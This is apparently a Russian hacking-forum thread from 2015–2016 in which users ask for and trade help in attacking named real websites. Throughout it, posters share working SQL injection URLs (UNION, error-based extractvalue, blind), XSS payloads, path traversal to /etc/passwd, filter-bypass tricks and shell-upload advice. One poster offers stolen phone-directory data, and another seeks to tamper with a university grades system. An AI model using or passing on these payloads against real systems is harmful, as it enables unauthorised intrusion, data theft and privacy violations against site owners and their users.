/home/w/wermark/raa.ru/public_html/libraries/legacy/view/legacy.php(401): ContentModelArticle->getItem() #10 /home/w/wermark/raa.ru/public_html/components/com_content/views/article/view.html.php(42): JViewLegacy->get('Item') #11 /home/w/wermark/raa.ru/public_html/libraries/legacy/controller/legacy.php(690): ContentViewArticle->display() #12 /home/w/wermark/raa.ru/public_html/components/com_content/controller.php(104): JControllerLegacy->display(true, Array) #13 /home/w/wermark/raa.ru/public_html/libraries/legacy/controller/legacy.php(728): ContentController->display() #14 /home/w/wermark/raa.ru/public_html/components/com_content/content.php(38): JControllerLegacy->execute(NULL) #15 /home/w/wermark/raa.ru/public_html/libraries/cms/component/helper.php(392): require_once('/home/w/wermark...') #16 /home/w/wermark/raa.ru/public_html/libraries/cms/component/helper.php(372): JComponentHelper::executeComponent('/home/w/wermark...') #17 /home/w/wermark/raa.ru/public_html/libraries/cms/application/site.php(191): JComponentHelper::renderComponent('com_content') #18 /home/w/wermark/raa.ru/public_html/libraries/cms/application/site.php(230): JApplicationSite->dispatch() #19 /home/w/wermark/raa.ru/public_html/libraries/cms/application/cms.php(252): JApplicationSite->doExecute() #20 /home/w/wermark/raa.ru/public_html/index.php(48): JApplicationCms->execute() #21 {main}
Что можно хорошего получить от этой ошибки?


каким запросом она вызвана? когда в параметр id добавили обратный слэш?

vivona
28.12.2015, 02:13
yarbabin said:
↑ (https://antichat.live/posts/3933075/)
с чего вы взяли?
каким запросом она вызвана? когда в параметр id добавили обратный слэш?


так там что со слещем что без слеша нет разници, это просто ошибка DB поробуй крутануть любым способом,нечего не выйдет

BabaDook
28.12.2015, 03:32
yarbabin said:
↑ (https://antichat.live/posts/3933075/)
с чего вы взяли?
каким запросом она вызвана? когда в параметр id добавили обратный слэш?


Как я понял http://www.raa.ru/index.php?id=

BlitzXX
28.12.2015, 15:39
Можно реализовать XSS? Фильтруется только "Text
[/CODE]
p\s gde text

faza02
30.12.2015, 03:35
vivona said:
↑ (https://antichat.live/posts/3933092/)
так там что со слещем что без слеша нет разници, это просто ошибка DB поробуй крутануть любым способом,нечего не выйдет


не заметил ошибку, колонки header просто нет.

kostea
30.12.2015, 16:56
Ребята что тут sql или xpatch

http://www.telebank.md/wap/(S(obtdv...x?Lang=EN' AND 3*2*1=6 AND '000hDWg'='000hDWg (http://www.telebank.md/wap/(S(obtdvf45rru1hh55hggikmnf))/About.aspx?Lang=EN%27%20AND%203*2*1=6%20AND%20%270 00hDWg%27=%27000hDWg)

kingbeef
31.12.2015, 19:16
kostea said:
↑ (https://antichat.live/posts/3934199/)
Ребята что тут sql или xpatch
http://www.telebank.md/wap/(S(obtdvf45rru1hh55hggikmnf))/About.aspx?Lang=EN' AND 3*2*1=6 AND '000hDWg'='000hDWg (http://www.telebank.md/wap/(S(obtdvf45rru1hh55hggikmnf))/About.aspx?Lang=EN%27%20AND%203*2*1=6%20AND%20%270 00hDWg%27=%27000hDWg)


Какой-то странный вопрос.

http://www.telebank.md/wap/(S(usma2... AND 3*2*1=6" onmouseover='alert(1234567890)' (http://www.telebank.md/wap/%28S%28usma2g45lhjkjtuge40xr445%29%29/cr_menu.aspx?Lang=EN%27%20AND%203*2*1=6%22%20onmou seover=%27alert%281234567890%29%27)

Тут xss или alert ?

XAMEHA
01.01.2016, 04:59
kingbeef said:
↑ (https://antichat.live/posts/3934603/)
Какой-то странный вопрос.
Тут xss или alert?


Бинарарные операции практически эквивалентны в языках XPath и SQL.



kostea, Почитайте про XPath: http://www.w3.org/TR/xpath/ (http://www.w3.org/TR/xpath/#function-starts-with)

Пользуясь некоторыми функциями вы сможете доказать или опровергнуть наличие XPath-инъекции, однако это автоматом не означает, что там SQL. К примеру:


Code:
substring('12345',0,3)='12'
substring-before('1999/04/01','/')='1999'

если что-то не отработает, то значит, что это не XPath.

segodnya
02.01.2016, 00:16
Помогите раскрутить пожалуйста


https://lk.ourmission.space/?ref=393
'

kingbeef
02.01.2016, 12:01
segodnya said:
↑ (https://antichat.live/posts/3934930/)
Помогите раскрутить пожалуйста


Используй ExtractValue . Все работает.

segodnya
02.01.2016, 12:12
kingbeef said:
↑ (https://antichat.live/posts/3935015/)
Используй ExtractValue . Все работает.


Пробую, не получается ничего вывести

если можно в ЛС пожалуйста

Strilo4ka
02.01.2016, 13:38
segodnya said:
↑ (https://antichat.live/posts/3935020/)
Пробую, не получается ничего вывести
если можно в ЛС пожалуйста


там скуля в insert и усе легко крутится, ответили же


Code:
https://lk.ourmission.space/?ref=-393' and 0 /*!union*/ select 0x27262873656C656374202A2066726F6D2873656C65637420 6E616D655F636F6E73742876657273696F6E28292C31292C6E 616D655F636F6E73742876657273696F6E28292C3129296129 2627-- -

segodnya
02.01.2016, 13:54
Strilo4ka said:
↑ (https://antichat.live/posts/3935053/)
там скуля в insert и усе легко крутится, ответили же

Code:
https://lk.ourmission.space/?ref=-393' and 0 /*!union*/ select 0x27262873656C656374202A2066726F6D2873656C65637420 6E616D655F636F6E73742876657273696F6E28292C31292C6E 616D655F636F6E73742876657273696F6E28292C3129296129 2627-- -



спасибо, но не могу получить md5 пароль, определенного пользователя каким запросом это осуществить!

Legionanonymous
02.01.2016, 14:05
Киньте мануальчик или посдкажите как взломать сайт если на нём нету ?id= и т.д а в таком виде страницы http://www.site.com/game/The_Elder_Scrolls_Online_Tamriel_Unlimited или в Html на конце.

BabaDook
02.01.2016, 14:21
Парни, подскажите как в бурп сюте сохранить карту сайта для передаче sqlmapу. Может не карта сайта называется... что бы не краулить сайт по новой. Спасибо

kingbeef
02.01.2016, 17:28
segodnya said:
↑ (https://antichat.live/posts/3935058/)
спасибо, но не могу получить md5 пароль, определенного пользователя
каким запросом это осуществить!


С помощью where

BabaDook
03.01.2016, 07:50
http://www.maltatoday.com.mt/ui_frontend/video_thumbnail/300/175/?url= можно что-то придумать?

Konqi
03.01.2016, 18:10
BabaDook said:
↑ (https://antichat.live/posts/3935418/)
http://www.maltatoday.com.mt/ui_frontend/video_thumbnail/300/175/?url=
можно что-то придумать?


придумать что? что вас смущает?

BabaDook
03.01.2016, 19:08
Konqi said:
↑ (https://antichat.live/posts/3935611/)
придумать что? что вас смущает?


не получается заюзать.

Konqi
03.01.2016, 19:10
BabaDook said:
↑ (https://antichat.live/posts/3935639/)
не получается заюзать.


что именно заюзать? вы видите там уязвимость?

по соседству есть Reflected XSS


Code:
http://www.maltatoday.com.mt/ui_frontend/

BabaDook
03.01.2016, 19:53
Konqi said:
↑ (https://antichat.live/posts/3935640/)
что именно заюзать? вы видите там уязвимость?
по соседству есть Reflected XSS

Code:
http://www.maltatoday.com.mt/ui_frontend/



xss видел , нельзя выполнить код на стороне сайта, Насколько я понял он должен открывать картинку , если там правильно подсунуть то там возможен rfi наверное... Я ошибаюсь?

Konqi
03.01.2016, 20:04
BabaDook said:
↑ (https://antichat.live/posts/3935659/)
xss видел , нельзя выполнить код на стороне сайта, Насколько я понял он должен открывать картинку , если там правильно подсунуть то там возможен rfi наверное... Я ошибаюсь?


ошибаешься

BabaDook
04.01.2016, 16:01
Konqi said:
↑ (https://antichat.live/posts/3935663/)
ошибаешься


Окей. Спасибо.

y6vmeq
04.01.2016, 18:45
Люди нужен хелп. Есть доступ к админке, нужен доступ к БД. Думаю найти файлы конфигов через шелл. Залить шелл никак не получается.

В админке есть редактор CKEditor 3.2 (revision 5191) и есть самописный загрузчик картинок (по содержимому не проверяется, проверяет только расширение и размер, после залития сразу файл переименовывает). Через загрузчик картинок шелл с расширениями картинок заливается на ура. Но вот как заствить его выполниться я не знаю. Опыта очень мало в таких делах.

Так же в строке поиска (тоже в админке) можно сделать такую ошибку, но я не знаю возможно здесь сделать чтонибудь.

http://hkar.ru/FTyL

kostea
04.01.2016, 23:07
Такая строка конфига как подключится

value="server=.\sqlexpress;database=ec*;user id=e**cms;password=**secb***

хост неуказан подключяюсь с шела,шелл на сервере

faza02
05.01.2016, 16:52
kostea said:
↑ (https://antichat.live/posts/3936121/)
Такая строка конфига как подключится
value="server=.\sqlexpress;database=ec*;user id=e**cms;password=**secb***
хост неуказан подключяюсь с шела,шелл на сервере


localhost

kostea
05.01.2016, 19:54
yarbabin said:
↑ (https://antichat.live/posts/3936348/)
localhost


Ну я так и зделал невкакую нехочет может минутка наидется?

Heartofprogrammer
05.01.2016, 20:36
Что можно сделать с этим http://avn.kstu.kg

Этот сайт предназначен для нашего университета. Там вся информация успеваемости студентов (Баллы, зачеты и т.д)

Хотел бы сделать с этим сайтом что-то, но не знаю что с ним можно сделать?

Для примера возьмем эту http://avn.kstu.kg/ReportServer/Pages/ReportViewer.aspx?/VUZ/s_f21_2&rs:Command=Render (http://avn.kstu.kg/ReportServer/Pages/ReportViewer.aspx?%2fVUZ%2fs_f21_2&rs%3aCommand=Render) где описано ФИО студентов и ихние баллы.

R3hab
05.01.2016, 23:16
.SpoilerTarget" type="button">Spoiler: site
http://www.fofv.org/page.php?id=2


Warning
: include(pages/content-2/../../../etc/passwd.php) [
function.include (http://www.fofv.org/function.include)
]: failed to open stream: No such file or directory in
/nfs/c04/h06/mnt/180466/domains/fofv.org/html/page.php
on line
328
Warning
: include() [
function.include (http://www.fofv.org/function.include)
]: Failed opening 'pages/content-2/../../../etc/passwd.php' for inclusion (include_path='.:/usr/local/php-5.3.29/share/pear') in
/nfs/c04/h06/mnt/180466/domains/fofv.org/html/page.php
on line
328



подскажите в какую сторону копать?

faza02
05.01.2016, 23:54
R3hab said:
↑ (https://antichat.live/posts/3936531/)
Spoiler: site
http://www.fofv.org/page.php?id=2
подскажите в какую сторону копать?


нульбайт или альтернатива, все обычно

l1ght
06.01.2016, 06:06
yarbabin said:
↑ (https://antichat.live/posts/3936540/)
нульбайт или альтернатива, все обычно




R3hab said:
↑ (https://antichat.live/posts/3936531/)
/usr/local/php-5.3.29/


садись, два

faza02
06.01.2016, 09:08
пропустил, что 5.3, спасибо l1ght

тогда вариантов, кроме как создать файл во внедоступной снаружи папке или неисполняемый, или через соседей - нет

ArmusIAm
08.01.2016, 22:51
Добрый вечер господа!

Буду признателен, если сможете мне подсказать.

Нашел SQL инъекцию на ресурсе (телефонный справочник), есть форма заполнения ФИО или номер телефона, собственно в ней и уязвимость.

Строка запроса получается так выглядит: /filename?fio=fio&telefon=123

Уязвимость присутствует в обоих переменных, при подставлении ' выходит следующее:

Bad SQL-query:

SELECT SQL_CALC_FOUND_ROWS * FROM piter WHERE fio LIKE 'fio%' AND telefon LIKE '123'%' LIMIT 0, 10

Mistake


Пытаюсь раскрутить стандартным образом:

/filename?fio=fio&telefon=123%27+order+by+1--

В ответ получаю следующее:

Bad SQL-query:

SELECT SQL_CALC_FOUND_ROWS * FROM piter WHERE fio LIKE 'fio%' AND telefon LIKE '123' order by 1--%' LIMIT 0, 10

Mistake

Долго тупил, пробовал как то отбросить окончание запроса %' LIMIT 0, 10, которое автоматически подставлялось, но безуспешно.

Потом я осознал, что можно зайти несколько иным способом, поскольку подставляемое окончание запроса портило мне все карты, я разделил этот запрос, в конечном итоге прихожу к следующему запросу:

/filename?fio=&telefon=955448%27+union+select+1,2,3+union+SELECT+ *+FROM+piter+WHERE+fio+LIKE+%27-as

Запрос прошел, отобразив мне выводимые поля, но я столкнулся с сложностью при переборе имен таблиц.

Ресурс выводит на страницу не более 10 записей из БД, иначе пишет, что найдено слишком много записей уточните запрос.

Но при составлении следующего запроса:

/filename?fio=&telefon=955448%27+union+select+table_name,2,3+FROM +INFORMATION_SCHEMA.TABLES+union+SELECT+*+FROM+pit er+WHERE+fio+LIKE+%27-as

Получаю следующее:

По вашему запросу найдено слишком много результатов (286). Пожалуйста, уточните ваш запрос.Mistake

Я так понимаю, запрос проходит без ошибки, он выделять имена столбцов (следуя из ответа сервера их около 280), но сам PHP скрипт на сервере не дает вывести их, так как в PHP скрипте в цикле идет проверка на размер массива и если он более 10 элементов, выводит вышеописанную ошибку.

Казалось бы чего сложного, можно перебрать поштучно используя LIMIT:

/filename?fio=&telefon=955448%27+union+select+table_name,2,3+FROM +INFORMATION_SCHEMA.TABLES+LIMIT+1,1+union+SELECT+ *+FROM+piter+WHERE+fio+LIKE+%27-as

По логике он должен выбрать одну запись из БД и отобразить ее, но в ответ я получаю следующее:

По вашему запросу найдено слишком много результатов (319). Пожалуйста, уточните ваш запрос.Mistake

Кол-во выбранных записей из БД не то что бы уменьшилось, а наоборот даже несколько увеличилось. Подскажите, где я ошибаюсь?

п.с.

К сожалению сам ресурс с уязвимостью в открытую палить не хочу, но если кому интересны телефонные базы, пишите в личку поделюсь всей инфой

Коллеги, заранее благодарен!!)

Br@!ns
10.01.2016, 03:44
ArmusIAm said:
↑ (https://antichat.live/posts/3937740/)
Добрый вечер господа!
Буду признателен, если сможете мне подсказать.
Нашел SQL инъекцию на ресурсе (телефонный справочник), есть форма заполнения ФИО или номер телефона, собственно в ней и уязвимость.
Строка запроса получается так выглядит: /filename?fio=fio&telefon=123
Уязвимость присутствует в обоих переменных, при подставлении ' выходит следующее:
Bad SQL-query:

SELECT SQL_CALC_FOUND_ROWS * FROM piter WHERE fio LIKE 'fio%' AND telefon LIKE '123'%' LIMIT 0, 10

Mistake

Пытаюсь раскрутить стандартным образом:
/filename?fio=fio&telefon=123%27+order+by+1--
В ответ получаю следующее:
Bad SQL-query:

SELECT SQL_CALC_FOUND_ROWS * FROM piter WHERE fio LIKE 'fio%' AND telefon LIKE '123' order by 1--%' LIMIT 0, 10

Mistake
Долго тупил, пробовал как то отбросить окончание запроса %' LIMIT 0, 10, которое автоматически подставлялось, но безуспешно.
Потом я осознал, что можно зайти несколько иным способом, поскольку подставляемое окончание запроса портило мне все карты, я разделил этот запрос, в конечном итоге прихожу к следующему запросу:
/filename?fio=&telefon=955448%27+union+select+1,2,3+union+SELECT+ *+FROM+piter+WHERE+fio+LIKE+%27-as
Запрос прошел, отобразив мне выводимые поля, но я столкнулся с сложностью при переборе имен таблиц.
Ресурс выводит на страницу не более 10 записей из БД, иначе пишет, что найдено слишком много записей уточните запрос.
Но при составлении следующего запроса:
/filename?fio=&telefon=955448%27+union+select+table_name,2,3+FROM +INFORMATION_SCHEMA.TABLES+union+SELECT+*+FROM+pit er+WHERE+fio+LIKE+%27-as
Получаю следующее:
По вашему запросу найдено слишком много результатов (286). Пожалуйста, уточните ваш запрос.Mistake
Я так понимаю, запрос проходит без ошибки, он выделять имена столбцов (следуя из ответа сервера их около 280), но сам PHP скрипт на сервере не дает вывести их, так как в PHP скрипте в цикле идет проверка на размер массива и если он более 10 элементов, выводит вышеописанную ошибку.
Казалось бы чего сложного, можно перебрать поштучно используя LIMIT:
/filename?fio=&telefon=955448%27+union+select+table_name,2,3+FROM +INFORMATION_SCHEMA.TABLES+LIMIT+1,1+union+SELECT+ *+FROM+piter+WHERE+fio+LIKE+%27-as
По логике он должен выбрать одну запись из БД и отобразить ее, но в ответ я получаю следующее:
По вашему запросу найдено слишком много результатов (319). Пожалуйста, уточните ваш запрос.Mistake
Кол-во выбранных записей из БД не то что бы уменьшилось, а наоборот даже несколько увеличилось. Подскажите, где я ошибаюсь?
п.с.
К сожалению сам ресурс с уязвимостью в открытую палить не хочу, но если кому интересны телефонные базы, пишите в личку поделюсь всей инфой
Коллеги, заранее благодарен!!)


попробуйте через erro based вектор, и вытягивать поштучно. что получается7

ArmusIAm
10.01.2016, 15:36
Br@!ns said:
↑ (https://antichat.live/posts/3938208/)
попробуйте через erro based вектор, и вытягивать поштучно. что получается7


Спасибо, сегодня попробую, отпишусь.

Пользуясь случаем еще один вопрос задам.

Есть сайт, простенький, СУБД PostgreSQL. На сервере еще 4 сайта, к которым и есть основной интерес. Сайт дырявый капец, SQL инъекция на инъекции. Но вот в чем проблема, какой то толковой админки не нашел, залить шелл через инъекцию не получается я так понимаю (сам код в БД вносит, но файл создавать не хочет, выдает ошибку). Собственно совсем отчаялся, всю БД прошерстил, ничего интересного, шелл не залить (только картинкой, но локального инклуда нет, залить .htaccess тоже не получается). Подскажите, а возможно как то в ходе инъекции сделать запрос в другую БД на сервере? Понятно, что это зависит от прав пользователя, не понимаю как сам запрос в таком случае составить.

faza02
10.01.2016, 17:37
ArmusIAm said:
↑ (https://antichat.live/posts/3938340/)
Спасибо, сегодня попробую, отпишусь.
Пользуясь случаем еще один вопрос задам.
Есть сайт, простенький, СУБД PostgreSQL. На сервере еще 4 сайта, к которым и есть основной интерес. Сайт дырявый капец, SQL инъекция на инъекции. Но вот в чем проблема, какой то толковой админки не нашел, залить шелл через инъекцию не получается я так понимаю (сам код в БД вносит, но файл создавать не хочет, выдает ошибку). Собственно совсем отчаялся, всю БД прошерстил, ничего интересного, шелл не залить (только картинкой, но локального инклуда нет, залить .htaccess тоже не получается). Подскажите, а возможно как то в ходе инъекции сделать запрос в другую БД на сервере? Понятно, что это зависит от прав пользователя, не понимаю как сам запрос в таком случае составить.


версия PSQL какая?

ArmusIAm
10.01.2016, 17:39
yarbabin said:
↑ (https://antichat.live/posts/3938396/)
версия PSQL какая?


PostgreSQL 9.1.16 on x86_64-unknown-linux-gnu, compiled by gcc-4.7.real (Debian 4.7.2-5) 4.7.2, 64-bit

l1ght
10.01.2016, 22:41
ArmusIAm, отвечая на вопрос, один результат тебе дает первый query "955448' " и сотни последний " LIKE '%' "

можно конечно и дальше шаманить с длинными или сложными запросами (1=0, error-based, blind, ;%00)

только в твоем случае все гораздо проще


Пытаюсь раскрутить стандартным образом:
/filename?fio=fio&telefon=123%27+order+by+
1--
...
SELECT SQL_CALC_FOUND_ROWS * FROM piter WHERE fio LIKE 'fio%' AND telefon LIKE '123' order by 1--%' LIMIT 0, 10


цитата с документации


В версии сервера MySQL 3.23.3 и выше поддерживается комментирование с помощью символов `--' - при условии, что за комментарием следует пробел. Это объясняется тем, что данный стиль комментирования вызвал много проблем при автоматической генерации SQL-запросов, в которых присутствовал код, подобный приведенному ниже (величина платежа вставляется в выражение !payment! автоматически):
UPDATE tbl_name SET credit=credit-!payment!
Давайте представим себе, что произойдет в случае, если величина payment окажется отрицательной. Поскольку выражение 1--1 в SQL является допустимым, то просто страшно себе вообразить последствия в случае, если будут разрешены комментарии, начинающиеся с `--',

BlitzXX
10.01.2016, 22:59
Фильтруется только ковычка ( " )

Возможно ?

XAMEHA
11.01.2016, 07:57
assmaday said:
↑ (https://antichat.live/posts/3936342/)
Подскажите пожалуйста.
Конструкция такого вида как-то обходится, в плане внедрения SQL Inj:
$r = str_replace('"','',str_replace("'","",$_GET['r'])); //[1]
$sql = "SELECT `id` FROM `tbl_categories` WHERE `title`='".$r."'"; //[2]
$result = mysql_query($sql,$con); //[3]
Я так понимаю, на строке 1 все hex и соncat остаются строкой типа "CONCAT(CHAR(84),CHAR(114),... и т.д или 0x5472616e6365
Тоесть во вторую строку не подсунуть " union ???


Только если вы контролируете два поля подряд, sql_mode дефолтный и magic_quote = off.



Field_1 =test\

Field_2 = UNION SELECT ... --


BlitzXX said:
↑ (https://antichat.live/posts/3938543/)

Фильтруется только ковычка ( " )
Возможно ?


Нет, это необходимая и достаточная фильтрация.

BabaDook
12.01.2016, 22:07
всем привет . помогите человеки добрые

'or

extractvalue(0x0a,concat(0x0a,(select user())))and'#

как проверить права юзера

'or

extractvalue(0x0a,concat(0x0a,(select file_priv))) from+mysql.user and'# даёт ошибку синтекса.

extractvalue(0x0a,concat(0x0a,(select load_file('/etc/passwd'))))and'

Method Not Implemented

GET to /view_cat.php not supported.

могу сайт кинуть. Хочецо научицо . а то sqlХРАП как слепые крутит

Konqi
12.01.2016, 22:17
BabaDook said:
↑ (https://antichat.live/posts/3939499/)
всем привет . помогите человеки добрые
'or
extractvalue(0x0a,concat(0x0a,(select user())))and'#
как проверить права юзера
'or
extractvalue(0x0a,concat(0x0a,(select file_priv))) from+mysql.user and'# даёт ошибку синтекса.




Code:
'or(extractvalue(1,concat(0x3a,(select(file_priv)f rom(mysql.user)where(user='BabaDook')limit+0,1)))) and'

BabaDook
12.01.2016, 22:22
Konqi said:
↑ (https://antichat.live/posts/3939501/)

Code:
'or(extractvalue(1,concat(0x3a,(select(file_priv)f rom(mysql.user)where(user='BabaDook')limit+0,1)))) and'



Спасибо.

nik1201
13.01.2016, 11:49
Подскажите что можно сделать с этим? когда я вместо ника пишу

Вот ошибка

SQL: INSERT INTO pre_ucenter_members(uid,username,password,email,my id,myidkey,regip,regdate,lastloginip,lastlogintime ,salt,secques) VALUES (28472, ' ', '000', 'none', '', '', '', 1452657744, '0', '0', '111', '')

Error: Duplicate entry ' Errno.: 1062

Там кстати вместо ника если хоть что напишешь,то код вместо ника выполнятся будет,можно что бы простая кнопка была вместо ника)))

ArmusIAm
13.01.2016, 22:55
Скорее всего это XSS уязвимость.


nik1201 said:
↑ (https://antichat.live/posts/3939690/)
Там кстати вместо ника если хоть что напишешь,то код вместо ника выполнятся будет,можно что бы простая кнопка была вместо ника)))


Выполняться будут HTML и Javascript, PHP интерпретироваться не будет. Уязвимость можно использовать для получения куки администратора или других пользователей, используя их можно зайти под их аккаунтом на сайт.


nik1201 said:
↑ (https://antichat.live/posts/3939690/)
Подскажите что можно сделать с этим? когда я вместо ника пишу
Вот ошибка
SQL: INSERT INTO pre_ucenter_members(uid,username,password,email,my id,myidkey,regip,regdate,lastloginip,lastlogintime ,salt,secques) VALUES (28472, ' ', '000', 'none', '', '', '', 1452657744, '0', '0', '111', '')
Error: Duplicate entry ' Errno.: 1062


Ошибка говорит о том, что в таблице есть поле с уникальным значением и данный запрос ее дублирует. При добавке данных скрипт грубо говоря хочет вложить дважды одно и тоже значение в это поле.

Ошибка возникает только при данном логине? Если да, то видимо это поле и является уникальным, и записать еще одну запись с тем же логином сервер не может. Вообщем по экспериментируй с теми данными, что заполняешь.

Ruslord1
13.01.2016, 23:13
nik1201 said:
↑ (https://antichat.live/posts/3939690/)
Подскажите что можно сделать с этим? когда я вместо ника пишу
Вот ошибка
SQL: INSERT INTO pre_ucenter_members(uid,username,password,email,my id,myidkey,regip,regdate,lastloginip,lastlogintime ,salt,secques) VALUES (28472, ' ', '000', 'none', '', '', '', 1452657744, '0', '0', '111', '')
Error: Duplicate entry ' Errno.: 1062
Там кстати вместо ника если хоть что напишешь,то код вместо ника выполнятся будет,можно что бы простая кнопка была вместо ника)))


такой сверхуязвимости я еще не встречал )

Zen1T21
14.01.2016, 00:41
Ruslord1 said:
↑ (https://antichat.live/posts/3939962/)
такой сверхуязвимости я еще не встречал )


Просто внедрение html в страницу

ArmusIAm
14.01.2016, 00:42
Добрый вечер!)

Парни, явно нащупал скулю на сайте, а развить никак не получается, застрял в самом начале

http://inata.info/realty/rent/11+order+by+11--/

Но при составлении запроса

http://inata.info/realty/rent/11+UnIOn+sELeCt+1,2,3,4,5,6,7,8,9,10,11--/

DB query error.

Please try later.

Как только не крутил, не раскручивается. Это видимо некий мод в Битрикс, я посмотрел, что Битрикс может работать как с MySQL так и с Oracle, пробовал итак итак никак. Я так понимаю вопрос в самих union select, видимо фильтр какой то. Пытался по статьям обойти, никаких результатов.

Благодарю!)

winstrool
14.01.2016, 12:05
ArmusIAm said:
↑ (https://antichat.live/posts/3939990/)
Добрый вечер!)
Парни, явно нащупал скулю на сайте, а развить никак не получается, застрял в самом начале
http://inata.info/realty/rent/11+order+by+11--/
Но при составлении запроса
http://inata.info/realty/rent/11+UnIOn+sELeCt+1,2,3,4,5,6,7,8,9,10,11--/
DB query error.

Please try later.
Как только не крутил, не раскручивается. Это видимо некий мод в Битрикс, я посмотрел, что Битрикс может работать как с MySQL так и с Oracle, пробовал итак итак никак. Я так понимаю вопрос в самих union select, видимо фильтр какой то. Пытался по статьям обойти, никаких результатов.
Благодарю!)


http://inata.info/realty/rent/11+group+by+63/ - true

на union похоже фильтр стоит, как вариант крутить блинд:

http://inata.info/realty/rent/11+and(SUBSTRING((SELECT+version()),1,1))=5+--+/

При таком запросе ошибка пропадает, но вывода не нашел, возможно в какой-то из колонок нужно корректный параметр поставить:

http://inata.info/realty/rent/11+and+1=0+uNiON sELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60,61,62,63+--+/ (http://inata.info/realty/rent/11+and+1=0+%75NiON%0A%73ELECT+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60 ,61,62+--+/)

ArmusIAm
16.01.2016, 02:06
Спасибо!


winstrool said:
↑ (https://antichat.live/posts/3940106/)
возможно в какой-то из колонок нужно корректный параметр поставить:
http://inata.info/realty/rent/11+and+1=0+uNiON sELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60,61,62,63+--+/ (http://inata.info/realty/rent/11+and+1=0+%75NiON%0A%73ELECT+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60 ,61,62+--+/)


А в чем преимущество данного запроса? Я так понял, единственное отличие, знак конца строки - %0a. Но после него, что не пиши, сервер не выводит ни объект недвижимости, ни ошибку, даже если кавычку поставить. Что он делает в рамках инъекции? И что ты имеешь ввиду под корректным параметром?

Извини за такое кол-во вопросов, но хочется именно понимать, а не просто взломать. Буду очень признателен)